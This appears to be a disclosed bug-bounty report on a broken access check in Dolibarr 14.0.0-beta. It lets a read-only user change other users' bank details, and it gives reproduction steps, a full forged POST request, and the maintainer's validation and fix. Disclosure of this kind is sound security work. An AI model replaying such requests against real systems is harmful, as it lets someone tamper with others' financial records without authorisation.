Improper Handling of Insufficient Privileges in dolibarr/dolibarr

Valid

Reported on

May 24th 2021


💥 BUG

unprivileged user can attach bank to another user.

💥 IMPACT

user who dont have any access in "users and groups" can update users bank details

💥 TESTED VERSION

dolibarr 14.0.0-beta

💥 STEP TO REPRODUCE

1. First goto admin account and add user B as normal user .
Now give user B bellow permission for Banks and cash module .

--->Read financial accounts

Now dont give any permission for Users & Groups module .

So, user B cant see or update any users details .Also cant update users bank details

2. Now from admin account goto HR and Bank of any other user by visiting url like http://localhost/dolibarr-develop/htdocs/user/bank.php?id=1.
And here add a bank details .

3. Finally goto user B account and sent bellow request to update bank details .

POST /dolibarr-develop/htdocs/user/bank.php?id=1 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/85.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 209
Origin: http://localhost
Connection: close
Referer: http://localhost/dolibarr-develop/htdocs/user/bank.php?id=1&bankid=1&action=edit
Cookie:  DOLSESSID_8e8881ad773ee74880c453666c22c288=kd3isa1fp3c53e419fgn79lilo
Upgrade-Insecure-Requests: 1
ACCOUNT: TEST2

token=$2y$10$wc1M5v3Z56ITbdACetnEPu7M6Nc/xILSazkIEvhhNDwtnC4tTEvr2&action=update&id=1&bankid=1&label=cbbcbbb_by_user&bank=hghgg+by_users&number=&iban=856345255&bic=654555&domiciliation=&proprio=&owner_address=

So, user B dont have any "users and groups" permission and also has read-only permission in bank can update other user bank details .

Laurent
2 months ago

Maintainer


According to code of v14.0.2, the controller for action=update to tupdate a bank is protected with if ($action == 'update' && !$cancel && $permissiontoaddbankaccount) { So user B should have a write permission among 1 of the list $permissiontoaddbankaccount = (!empty($user->rights->salaries->write) || !empty($user->rights->hrm->employee->write) || !empty($user->rights->user->creer));

Can you check

Laurent Destailleur validated this vulnerability a month ago
ranjit-git has been awarded the disclosure bounty
The fix bounty is now up for grabs
Laurent Destailleur confirmed that a fix has been merged on bb64a2 a month ago
Laurent Destailleur has been awarded the fix bounty